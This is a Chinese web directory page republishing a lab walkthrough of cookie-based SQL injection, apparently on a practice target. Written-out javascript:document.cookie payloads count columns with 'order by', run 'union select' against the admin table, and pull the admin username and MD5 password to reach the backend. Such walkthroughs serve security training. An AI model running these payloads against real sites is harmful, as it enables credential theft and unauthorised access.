亚洲视频二区_亚洲欧洲日本天天堂在线观看_日韩一区二区在线观看_中文字幕不卡一区

公告:魔扣目錄網為廣大站長提供免費收錄網站服務,提交前請做好本站友鏈:【 網站目錄:http://www.430618.com 】, 免友鏈快審服務(50元/站),

點擊這里在線咨詢客服
新站提交
  • 網站:51998
  • 待審:31
  • 小程序:12
  • 文章:1030137
  • 會員:747

經過了我們前段時間的sql注入學習,今天我們來深入學習一下sql注入之cookie注入

首先我們打開靶場環境

再一次重現sql注入,黑客技法詳解

 

隨便點開一篇文章

嘗試在結尾構造一下 and 1=1

再一次重現sql注入,黑客技法詳解

 

可見是使用了防注入的,但是目前我們是使用get方式提交的參數,我們將id=171包括后面的全部刪除一下試試

顯示數據庫出錯

這里存在cookie注入,首先我們恢復成原來的界面

再一次重現sql注入,黑客技法詳解

 

然后我們下載一個ModHeader瀏覽器插件,將cookie設置為id的值。然后我們訪問

其去掉后面?id的網頁,發現并沒有顯示數據庫出錯了

然后將IE欄清空,輸入

再一次重現sql注入,黑客技法詳解

 

JAVAscript:alert(document.cookie="id="+escape("171"));

這個語句就是構造一個JS,把內容插入到cookie里面去

再一次重現sql注入,黑客技法詳解

 

返回出一個id=171

然后我們來手工注入一下他的字段數

JavaScript:alert(document.cookie="id="+escape("171 order by 10"));

再一次重現sql注入,黑客技法詳解

 

可以知道他有10個字段數

然后我們里顯示他的值

javascript:alert(document.cookie="id="+escape("171 union select 1,2,3,4,5,6,7,8,9,10 from admin"));

再一次重現sql注入,黑客技法詳解

 

再刷新一遍發現顯示2,3

然后我們來破解賬號和密碼

javascript:alert(document.cookie="id="+escape("171 union select 1,password,username,4,5,6,7,8,9,10 from admin"));

再一次重現sql注入,黑客技法詳解

 

得出來MD5加密后密碼,解密后welcome,然后就可以登錄后臺了。

最后喜歡我文章的朋友請加圈子關注我們,私信關鍵詞:加群。(送免費資料和優惠券)

就會自動分享給你群號。歡迎大家加入我們的安全大家庭。提高大家的安全意識,提升大家的網絡安全技能一直是我們的初衷和愿景,讓我們共同成為守護信息世界的"SaFeMAN"。

還有可以關注我們微信公眾號,在公眾號上輸入安界網,就可以關注到我們,領取資料和優惠券!

分享到:
標簽:注入 sql
用戶無頭像

網友整理

注冊時間:

網站:5 個   小程序:0 個  文章:12 篇

  • 51998

    網站

  • 12

    小程序

  • 1030137

    文章

  • 747

    會員

趕快注冊賬號,推廣您的網站吧!
最新入駐小程序

數獨大挑戰2018-06-03

數獨一種數學游戲,玩家需要根據9

答題星2018-06-03

您可以通過答題星輕松地創建試卷

全階人生考試2018-06-03

各種考試題,題庫,初中,高中,大學四六

運動步數有氧達人2018-06-03

記錄運動步數,積累氧氣值。還可偷

每日養生app2018-06-03

每日養生,天天健康

體育訓練成績評定2018-06-03

通用課目體育訓練成績評定